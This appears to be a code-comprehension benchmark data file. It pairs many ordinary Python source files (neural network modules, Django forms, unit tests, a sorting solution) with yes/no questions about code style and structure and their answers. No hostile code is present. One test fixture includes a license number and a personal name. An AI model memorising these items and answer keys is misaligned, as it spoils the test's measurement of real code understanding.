def forward(self, x):
i = x[:,:,0:1,:]-x[:,:,2:3,:]
q = x[:,:,1:2,:]
return torch.cat([i,q],dim=2)
##### CLASSIFIER FROM KRZYSTON ET AL. 2020 #####
class Complex(nn.Module):
def __init__(self,
n_classes: int = 11
):
super(Complex, self).__init__()
# define the dropout layer
self.dropout = nn.Dropout(p = 0.5)
# convolutional layers w/ weight initialization
self.conv1 = nn.Conv2d(1, 256, kernel_size=(2,3), stride=1, padding = (1,1), bias = True)
torch.nn.init.xavier_uniform_(self.conv1.weight)
self.conv2 = nn.Conv2d(256, 80, kernel_size=(2,3), stride=1, padding = (0,1), bias = True)
torch.nn.init.xavier_uniform_(self.conv2.weight)
# dense layers w/ weight initialization
self.dense1 = nn.Linear(80*128, 256, bias =True)
torch.nn.init.kaiming_normal_(self.dense1.weight, nonlinearity='relu')
self.dense2 = nn.Linear(256,n_classes, bias = True)
torch.nn.init.kaiming_normal_(self.dense2.weight, nonlinearity='sigmoid')
# Defining the forward pass
def forward(self, x):
x = self.conv1(x)
x = LC.forward(self,x)
x = F.relu(x)
x = self.dropout(x)
x = F.relu(self.conv2(x))
x = self.dropout(x)
x = x.view(x.size(0), -1)
x = F.relu(self.dense1(x))
x = self.dense2(x)
return x | [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": ... | 3 | models_ieee_icc.py | LiLee1/High_Capacity_Complex_Networks |
# encoding: utf-8
"""
@author: xingyu liao
@contact: sherlockliao01@gmail.com
"""
import torch
from torch import nn
import torch.nn.functional as F
from torch.nn import Parameter
class CosSoftmax(nn.Module):
r"""Implement of large margin cosine distance:
Args:
in_feat: size of each input sample
num_classes: size of each output sample
"""
def __init__(self, cfg, in_feat, num_classes):
super().__init__()
self.in_features = in_feat
self._num_classes = num_classes
self.s = cfg.MODEL.HEADS.SCALE
self.m = cfg.MODEL.HEADS.MARGIN
self.weight = Parameter(torch.Tensor(num_classes, in_feat))
nn.init.xavier_uniform_(self.weight)
def forward(self, features, targets):
# --------------------------- cos(theta) & phi(theta) ---------------------------
cosine = F.linear(F.normalize(features), F.normalize(self.weight))
phi = cosine - self.m
# --------------------------- convert label to one-hot ---------------------------
targets = F.one_hot(targets, num_classes=self._num_classes)
output = (targets * phi) + ((1.0 - targets) * cosine)
output *= self.s
return output
def extra_repr(self):
return 'in_features={}, num_classes={}, scale={}, margin={}'.format(
self.in_feat, self._num_classes, self.s, self.m
)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer":... | 3 | fastreid/layers/cos_softmax.py | tycallen/fast-reid |
"""
Copyright 2013 Steven Diamond, 2017 Akshay Agrawal
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import abc
class ParamProb:
"""An abstract base class for parameterized problems.
Parameterized problems are produced during the first canonicalization
and allow canonicalization to be short-circuited for future solves.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractproperty
def is_mixed_integer(self) -> bool:
"""Is the problem mixed-integer?"""
raise NotImplementedError()
@abc.abstractproperty
def apply_parameters(self, id_to_param_value=None, zero_offset=False,
keep_zeros=False):
"""Returns A, b after applying parameters (and reshaping).
Args:
id_to_param_value: (optional) dict mapping parameter ids to values
zero_offset: (optional) if True, zero out the constant offset in the
parameter vector
keep_zeros: (optional) if True, store explicit zeros in A where
parameters are affected
"""
raise NotImplementedError()
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/c... | 3 | cvxpy/problems/param_prob.py | rpradal/cvxpy |
import os
from functools import lru_cache
from pathlib import Path
from pydantic import BaseSettings
class Settings(BaseSettings):
PROJECT_NAME = "Book Search"
API_V1_STR = "/api/v1"
ES_HOST = "127.0.0.1:9200"
"""
.. _ES_HOST:
ElasticSearch hosts
"""
BACKEND_CORS_ORIGINS: str = ".*"
class Config:
case_sensitive = False
env_file = Path(os.getcwd()) / ".env"
@lru_cache()
def get_settings() -> BaseSettings:
"""
Get settings instance.
Cached via lru_cache.
"""
return Settings()
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": false
}... | 3 | book_search/app_settings.py | yakky/microservice-talk |
# coding=utf-8
import unittest
from smallinvoice.accounts import Account
from smallinvoice.tests import get_smallinvoice
def generate_account():
return Account(title='Testaccount',
institute='Familie Test',
number='Number123',
iban='Iban123',
swiftbic='Swift123',
clearing='clearing123',
postaccount='postaccount123',
lsv=0,
dd=0,
esr=1)
class AccountTests(unittest.TestCase):
def setUp(self):
self.a = generate_account()
self.account_id = get_smallinvoice().accounts.add(self.a)
def tearDown(self):
get_smallinvoice().accounts.delete(self.account_id)
def test_account_tests(self):
self.assertIsNotNone(self.account_id)
def test_account_add(self):
self.assertTrue(self.account_id)
def test_account_details(self):
self.assertEqual(self.a.institute, 'Familie Test')
def test_account_update(self):
self.assertEqual(self.a.institute, 'Familie Test')
self.a.institute = 'Test Change'
self.assertEqual(self.a.institute, 'Test Change')
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": ... | 3 | smallinvoice/tests/accounts_tests.py | dreipol/smallinvoice |
from __future__ import absolute_import, unicode_literals
from django import forms
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from mayan.apps.common.classes import ModelProperty
from mayan.apps.common.forms import FilteredSelectionForm
from mayan.apps.documents.models import Document
from .models import Index, IndexTemplateNode
from .permissions import permission_document_indexing_rebuild
class IndexTemplateFilteredForm(FilteredSelectionForm):
class Meta:
allow_multiple = True
field_name = 'index_templates'
help_text = _('Index templates to be queued for rebuilding.')
label = _('Index templates')
queryset = Index.objects.filter(enabled=True)
permission = permission_document_indexing_rebuild
widget_attributes = {'class': 'select2'}
class IndexTemplateNodeForm(forms.ModelForm):
"""
A standard model form to allow users to create a new index template node
"""
def __init__(self, *args, **kwargs):
super(IndexTemplateNodeForm, self).__init__(*args, **kwargs)
self.fields['index'].widget = forms.widgets.HiddenInput()
self.fields['parent'].widget = forms.widgets.HiddenInput()
self.fields['expression'].help_text = ' '.join(
[
force_text(self.fields['expression'].help_text),
'<br>',
ModelProperty.get_help_text_for(
model=Document, show_name=True
).replace('\n', '<br>')
]
)
class Meta:
fields = ('parent', 'index', 'expression', 'enabled', 'link_documents')
model = IndexTemplateNode
| [
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": false
},
{... | 3 | mayan/apps/document_indexing/forms.py | Syunkolee9891/Mayan-EDMS |
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities and tools to assist NQL tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from language.nql import nql
def cell(i, j):
"""Makes a cell name from coordinates."""
return 'cell_%d_%d' % (i, j)
def make_grid():
"""Create a grid, with relations for going n, s, e, w."""
result = nql.NeuralQueryContext()
result.declare_relation('n', 'place_t', 'place_t')
result.declare_relation('s', 'place_t', 'place_t')
result.declare_relation('e', 'place_t', 'place_t')
result.declare_relation('w', 'place_t', 'place_t')
result.declare_relation('color', 'place_t', 'color_t')
result.declare_relation('distance_to', 'place_t', 'corner_t')
kg_lines = []
dij = {'n': (-1, 0), 's': (+1, 0), 'e': (0, +1), 'w': (0, -1)}
for i in range(0, 4):
for j in range(0, 4):
cell_color = 'black' if (i % 2) == (j % 2) else 'white'
kg_lines.append('\t'.join(['color', cell(i, j), cell_color]) + '\n')
kg_lines.append(
'\t'.join(['distance_to', cell(i, j), 'ul',
str(i + j)]) + '\n')
for direction, (di, dj) in dij.items():
if (0 <= i + di < 4) and (0 <= j + dj < 4):
kg_lines.append(
'\t'.join([direction, cell(i, j),
cell(i + di, j + dj)]) + '\n')
result.load_kg(lines=kg_lines, freeze=True)
return result
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": fals... | 3 | language/nql/nql_test_lib.py | Ram81/language |
import torch
import torch.nn as nn
class ValueNet(nn.Module):
"""
The part of the actor critic network that computes the state value. Also,
returns the hidden layer before state valuation, for use in action network.
"""
def __init__(self, n_inputs: int, n_hidden: int = None):
"""
Specify the number of inputs. Also, specify the number of nodes in each
hidden layer. If no value is provided for the number of hidden, then
it is set to half the number of inputs.
"""
super(ValueNet, self).__init__()
if n_hidden is None:
n_hidden = (n_inputs + 2) // 2
self.n_hidden = n_hidden
self.hidden = nn.Sequential(
nn.Linear(n_inputs, n_hidden),
nn.ReLU()
)
self.value = nn.Linear(n_hidden, 1)
def forward(self, x):
"""
Returns the value of the state and the hidden layer values.
"""
x = self.hidden(x)
return self.value(x), x
class ActionNet(nn.Module):
"""
The part of the actor critic network that computes the action value.
"""
def __init__(self, n_action_inputs: int, n_value_hidden: int,
n_action_hidden: int = None):
"""
Takes as input the action features and the hidden values from the value
net. Returns a value for the action.
"""
super(ActionNet, self).__init__()
if n_action_hidden is None:
n_action_hidden = (n_action_inputs + n_value_hidden + 2) // 2
self.hidden = nn.Sequential(
nn.Linear(n_action_inputs + n_value_hidden, n_action_hidden),
nn.ReLU()
)
self.action_value = nn.Linear(n_action_hidden, 1)
def forward(self, action_x, value_hidden):
"""
Returns the value of the state and the hidden layer values.
"""
x = self.hidden(torch.cat((action_x, value_hidden), 1))
return self.action_value(x)
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?"... | 3 | apprentice/learners/when_learners/actor_critic.py | pearlfranz20/AL_Core |
from LAMARCK_ML.models.interface import ModellUtil
class DataSaverInterface(ModellUtil):
def __init__(self, **kwargs):
super(DataSaverInterface, self).__init__(**kwargs)
def get_individual_by_name(self, name):
raise NotImplementedError()
def get_ancestry_for_ind(self, ind_name):
raise NotImplementedError()
def get_ancestries(self):
raise NotImplementedError()
def get_individual_names(self):
raise NotImplementedError() | [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": ... | 3 | LAMARCK_ML/utils/dataSaver/interface.py | JonasDHomburg/LAMARCK |
# coding: utf-8
"""
Server API
Reference for Server API (REST/Json)
OpenAPI spec version: 1.4.58
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kinow_client
from kinow_client.rest import ApiException
from kinow_client.models.gender import Gender
class TestGender(unittest.TestCase):
""" Gender unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testGender(self):
"""
Test Gender
"""
model = kinow_client.models.gender.Gender()
if __name__ == '__main__':
unittest.main()
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
... | 3 | test/test_gender.py | kinow-io/kinow-python-sdk |
#!/usr/bin/python3
"""
Given an unsorted array nums, reorder it such that nums[0] < nums[1] > nums[2]
< nums[3]....
Example 1:
Input: nums = [1, 5, 1, 1, 6, 4]
Output: One possible answer is [1, 4, 1, 5, 1, 6].
Example 2:
Input: nums = [1, 3, 2, 2, 3, 1]
Output: One possible answer is [2, 3, 1, 3, 1, 2].
Note:
You may assume all input has valid answer.
Follow Up:
Can you do it in O(n) time and/or in-place with O(1) extra space?
"""
from typing import List
class Solution:
def wiggleSort(self, nums: List[int]) -> None:
"""
Do not return anything, modify nums in-place instead.
Median + 3-way partitioning
"""
n = len(nums)
# mid = self.find_kth(nums, 0, n, (n - 1) // 2)
# median = nums[mid]
median = list(sorted(nums))[n//2]
# three way pivot
odd = 1
even = n - 1 if (n - 1) % 2 == 0 else n - 2
i = 0
while i < n:
if nums[i] < median:
if i >= even and i % 2 == 0:
i += 1
continue
nums[i], nums[even] = nums[even], nums[i]
even -= 2
elif nums[i] > median:
if i <= odd and i % 2 == 1:
i += 1
continue
nums[i], nums[odd] = nums[odd], nums[i]
odd += 2
else:
i += 1
def find_kth(self, A, lo, hi, k):
p = self.pivot(A, lo, hi)
if k == p:
return p
elif k > p:
return self.find_kth(A, p + 1, hi, k)
else:
return self.find_kth(A, lo, p, k)
def pivot(self, A, lo, hi):
# need 3-way pivot, otherwise TLE
p = lo
closed = lo
for i in range(lo + 1, hi):
if A[i] < A[p]:
closed += 1
A[closed], A[i] = A[i], A[closed]
A[closed], A[p] = A[p], A[closed]
return closed
if __name__ == "__main__":
Solution().wiggleSort([1, 5, 1, 1, 6, 4])
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than ... | 3 | 324 Wiggle Sort II py3.py | krishna13052001/LeetCode |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from heat.common import wsgi
ssl_middleware_opts = [
cfg.StrOpt('secure_proxy_ssl_header',
default='X-Forwarded-Proto',
help="The HTTP Header that will be used to determine which "
"the original request protocol scheme was, even if it was "
"removed by an SSL terminator proxy.")
]
cfg.CONF.register_opts(ssl_middleware_opts)
class SSLMiddleware(wsgi.Middleware):
"""Replaces request wsgi.url_scheme env variable with value of HTTP header.
A middleware that replaces the request wsgi.url_scheme environment
variable with the value of HTTP header configured in
secure_proxy_ssl_header if exists in the incoming request.
This is useful if the server is behind a SSL termination proxy.
"""
def __init__(self, application):
super(SSLMiddleware, self).__init__(application)
self.secure_proxy_ssl_header = 'HTTP_{0}'.format(
cfg.CONF.secure_proxy_ssl_header.upper().replace('-', '_'))
def process_request(self, req):
req.environ['wsgi.url_scheme'] = req.environ.get(
self.secure_proxy_ssl_header, req.environ['wsgi.url_scheme'])
def list_opts():
yield None, ssl_middleware_opts
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
}... | 3 | heat/api/middleware/ssl.py | maestro-hybrid-cloud/heat |
import validate
# Test license numbers
ESMA_NUMBER = "E142304"
AHA_NUMBER = "195506016954"
ARC_NUMBER = "10FMU9"
DCA_NUMBER = "G 50925"
DCA_LASTNAME = "DOEMENY"
# Expected test results
ESMA_EXPECTED_RESULT = """
FULL NAME: Benjamin Thales Lenington
LICENSE STATUS: Active
LICENSE TYPE: EMT
ISSUE DATE: 9/14/2018
EXP DATE: 9/30/2022
"""
AHA_EXPECTED_RESULT = "TODO"
ARC_EXPECTED_RESULT = "TODO"
DCA_EXPECTED_RESULT = "TODO"
def test_validate_esma():
test_result = validate.validate_esma(ESMA_NUMBER)
assert ESMA_EXPECTED_RESULT in test_result
def test_validate_aha():
test_result = validate.validate_aha(AHA_NUMBER)
assert test_result == AHA_EXPECTED_RESULT
def test_validate_arc():
test_result = validate.validate_arc(ARC_NUMBER)
assert test_result == ARC_EXPECTED_RESULT
def test_validate_dca():
test_result = validate.validate_dca(DCA_NUMBER)
assert test_result == DCA_EXPECTED_RESULT
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",... | 3 | test_validate.py | benlen10/med-license-validator |
import logging
from datetime import datetime
import os
class Logger():
DEBUG = logging.DEBUG
INFO = logging.INFO
WARNING = logging.WARNING
ERROR = logging.ERROR
def __init__(self, name, path, level=DEBUG):
self._logger = None
self._setLogger(name, path, level)
def _setLogger(self, name, path, level):
self._logger = logging.getLogger(name)
self._logger.setLevel(level)
fileName = name + "-" + datetime.now().strftime("%Y-%m-%d-%H:%M:%S") + '.log'
fh = logging.FileHandler(os.path.join(path, fileName))
fh.setLevel(level)
ch = logging.StreamHandler()
ch.setLevel(level)
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
ch.setFormatter(formatter)
fh.setFormatter(formatter)
self._logger.addHandler(ch)
self._logger.addHandler(fh)
@property
def logger(self):
return self._logger
def close(self):
handlers = self._logger.handlers[:]
for handler in handlers:
handler.close()
self._logger.removeHandler(handler)
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than cla... | 3 | Logger/Logger.py | AsimJalwana/LUTA |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
from apache_beam.typehints import typehints
class RowTypeConstraint(typehints.TypeConstraint):
def __init__(self, fields):
self._fields = tuple(fields)
def _consistent_with_check_(self, sub):
return self == sub
def type_check(self, instance):
from apache_beam import Row
return isinstance(instance, Row)
def _inner_types(self):
"""Iterates over the inner types of the composite type."""
return [field[1] for field in self._fields]
def __eq__(self, other):
return type(self) == type(other) and self._fields == other._fields
def __hash__(self):
return hash(self._fields)
def __repr__(self):
return 'Row(%s)' % ', '.join(
'%s=%s' % (name, typehints._unified_repr(t)) for name,
t in self._fields)
def get_type_for(self, name):
return dict(self._fields)[name]
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inherit... | 3 | sdks/python/apache_beam/typehints/row_type.py | NarimanAB/beam |
"""
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import rdt
import sdv
from TrainDBBaseModel import TrainDBSynopsisModel
import pandas as pd
import torch
LOGGER = logging.getLogger(__name__)
class TVAE(TrainDBSynopsisModel):
def train(self, real_data, table_metadata):
self.columns, _ = self.get_columns(real_data, table_metadata)
LOGGER.info("Training %s", self.__class__.__name__)
model_kwargs = {}
self.model = sdv.tabular.TVAE(table_metadata=table_metadata, **model_kwargs)
self.model.fit(real_data)
def save(self, output_path):
self.model.save(output_path + '/model.pkl')
torch.save({
'columns': self.columns
}, output_path + '/model_info.pth')
def load(self, input_path):
self.model = sdv.tabular.TVAE.load(input_path + '/model.pkl')
saved_model_info = torch.load(input_path + '/model_info.pth')
self.columns = saved_model_info['columns']
def synopsis(self, row_count):
LOGGER.info("Synopsis Generating %s", self.__class__.__name__)
synthetic_data = self.model.sample(row_count)
synthetic_data = pd.DataFrame(synthetic_data, columns=self.columns)
return synthetic_data
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self... | 3 | models/TVAE.py | traindb-project/traindb-model |
def leia_int(n):
while True:
try:
nu = int(input(n))
except(ValueError, TypeError):
print('\033[31mERRO: por favor, digite um número inteiro válido.\033[m')
continue
else:
return nu
def leia_float(n):
while True:
try:
nu = float(input(n))
except(ValueError,TypeError):
print('ERRO: por favor, digite um número real valido')
else:
return nu
def leia_dado(esc):
valido = False
while not valido:
entrada = str(input(esc)).replace(',','.')
if entrada.isalpha() or entrada.strip() == '':
print(f'ERRO: \"{entrada}\" é um Preço invalido')
else:
valido = True
return float(entrada)
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding sel... | 3 | PARTE_3/EX034/dado.py | 0Fernando0/CursoPython |
# coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Interface Class
# this is a auto generated file generated by Cheetah
# Libre Office Version: 7.3
# Namespace: com.sun.star.animations
from abc import abstractproperty
from .x_animate import XAnimate as XAnimate_ca680c52
class XAnimateColor(XAnimate_ca680c52):
"""
Interface for animation by defining color changes over time.
Only color value will be legal values for the following members
See Also:
`API XAnimateColor <https://api.libreoffice.org/docs/idl/ref/interfacecom_1_1sun_1_1star_1_1animations_1_1XAnimateColor.html>`_
"""
__ooo_ns__: str = 'com.sun.star.animations'
__ooo_full_ns__: str = 'com.sun.star.animations.XAnimateColor'
__ooo_type_name__: str = 'interface'
__pyunointerface__: str = 'com.sun.star.animations.XAnimateColor'
@abstractproperty
def ColorInterpolation(self) -> int:
"""
defines the color space which is used to perform the interpolation.
"""
@abstractproperty
def Direction(self) -> bool:
"""
defines the direction which is used to perform the interpolation inside the color space defined with ColorInterpolation.
Values could be TRUE for clockwise and FALSE for counterclockwise.
This attribute will be ignored for color spaces where this does not make any sense.
"""
__all__ = ['XAnimateColor']
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer"... | 3 | ooobuild/lo/animations/x_animate_color.py | Amourspirit/ooo_uno_tmpl |
#!/usr/bin/env python
# (C) Netflix 2014
"""Lint command tests
"""
from nflx_oc.commands.dev import lint
import os
import unittest
class TestModuleDiscovery(unittest.TestCase):
""""""
def setUp(self):
self.test_data_root = os.path.join(os.path.dirname(lint.__file__), 'testdata/lint')
self.prevdir = os.getcwd()
os.chdir(self.test_data_root)
def tearDown(self):
os.chdir(self.prevdir)
def test_module_discovery(self):
"""Test our lint wrapper module discovery
"""
self.assertEqual(lint.find_python_modules('package'), ['package'])
self.assertEqual(lint.find_python_modules('two-modules'), ['two-modules/a', 'two-modules/b'])
self.assertEqual(lint.find_python_modules('two-modules-and-one-nested'),
['two-modules-and-one-nested/a', 'two-modules-and-one-nested/b', 'two-modules-and-one-nested/d/d2'])
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
... | 3 | staging/commands/dev/test_lint.py | cligraphy/cligraphy |
class Point:
counter = []
def __init__(self, x=0, y=0):
"""Konstruktor punktu."""
self.x = x
self.y = y
def update(self, n):
self.counter.append(n)
p1 = Point(0,0)
p2 = Point(1,1)
p1.counter.append(1)
p2.counter.append(3)
p1.counter[0] = 2
print(p1.counter)
print(p2.counter)
p1.update(1)
print(p1.counter)
print(p2.counter)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | zadanka/l5zad4.py | wrutkowski1000/wizualizacja-danych |
import pytest
from pages.aplication import Application
def pytest_addoption(parser):
parser.addoption('--browser_name', action='store', default="chrome", help="Choose browser: chrome or firefox")
parser.addoption('--base_url', action='store', default='https://prodoctorov.ru/new/rate/doctor/12/'
, help="Choose base_url")
@pytest.fixture
def app(request):
browser_name = request.config.getoption("--browser_name") # для вызова из командной строки и выбора браузера
base_url = request.config.getoption("--base_url")
fixture = Application(browser_name=browser_name, base_url=base_url)
yield fixture
print("\nquit browser..")
fixture.destroy()
return fixture
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": tru... | 3 | conftest.py | DedMazzai/feedback-form |
_HAS_OPS = False
def _register_extensions():
import os
import imp
import torch
# load the custom_op_library and register the custom ops
lib_dir = os.path.dirname(__file__)
_, path, _ = imp.find_module("_C", [lib_dir])
torch.ops.load_library(path)
try:
_register_extensions()
_HAS_OPS = True
except (ImportError, OSError):
pass
def _check_cuda_version():
"""
Make sure that CUDA versions match between the pytorch install and torchvision install
"""
if not _HAS_OPS:
return -1
import torch
_version = torch.ops.torchvision._cuda_version()
if _version != -1 and torch.version.cuda is not None:
tv_version = str(_version)
if int(tv_version) < 10000:
tv_major = int(tv_version[0])
tv_minor = int(tv_version[2])
else:
tv_major = int(tv_version[0:2])
tv_minor = int(tv_version[3])
t_version = torch.version.cuda
t_version = t_version.split('.')
t_major = int(t_version[0])
t_minor = int(t_version[1])
if t_major != tv_major or t_minor != tv_minor:
raise RuntimeError("Detected that PyTorch and torchvision were compiled with different CUDA versions. "
"PyTorch has CUDA Version={}.{} and torchvision has CUDA Version={}.{}. "
"Please reinstall the torchvision that matches your PyTorch install."
.format(t_major, t_minor, tv_major, tv_minor))
return _version
_check_cuda_version()
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"ans... | 3 | torchvision/extension.py | jamt9000/vision |
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import User
from rest_framework import serializers
from profiles.models import Profile
class ProfileSerializer(serializers.ModelSerializer):
class Meta:
model = Profile
fields = ['notification_enabled', 'subscribed_services_notification']
class UserSerializer(serializers.ModelSerializer):
profile = ProfileSerializer(required=False)
password = serializers.CharField(
write_only=True,
required=True,
help_text='Leave empty if no change needed',
style={'input_type': 'password', 'placeholder': 'Password'}
)
def create(self, validated_data):
validated_data['password'] = make_password(validated_data.get('password'))
return super(UserSerializer, self).create(validated_data)
class Meta:
model = User
fields = ['id', 'username', 'password', 'email', 'profile', 'first_name', 'last_name', 'is_staff',
'is_superuser', 'is_active']
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": false
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
}... | 3 | profiles/api/serializers/user_serializers.py | LaudateCorpus1/squest |
from typing import List, Dict, Sequence
import click
from valohai_cli.ctx import get_project
from valohai_cli.models.project import Project
from valohai_cli.range import IntegerRange
from valohai_cli.table import print_table
from valohai_cli.utils import subset_keys
def download_execution_data(project: Project, counters: Sequence[str]) -> Dict[str, dict]:
executions = {}
with click.progressbar(IntegerRange.parse(counters).as_set(), label='fetching information') as counter_iter:
for counter in counter_iter:
execution = project.get_execution_from_counter(counter=counter, params={
'exclude': 'metadata,events,tags',
})
executions[execution['id']] = execution
return executions
@click.command()
@click.argument('counters', required=True, nargs=-1)
def summarize(counters: List[str]) -> None:
"""
Summarize execution metadata.
Use the global `--table-format` switch to output JSON/TSV/CSV/...
"""
project = get_project(require=True)
assert project
executions = download_execution_data(project, counters)
all_metadata_keys = set()
all_metadata = {}
for execution in executions.values():
if execution['status'] in ('created', 'queued'):
continue
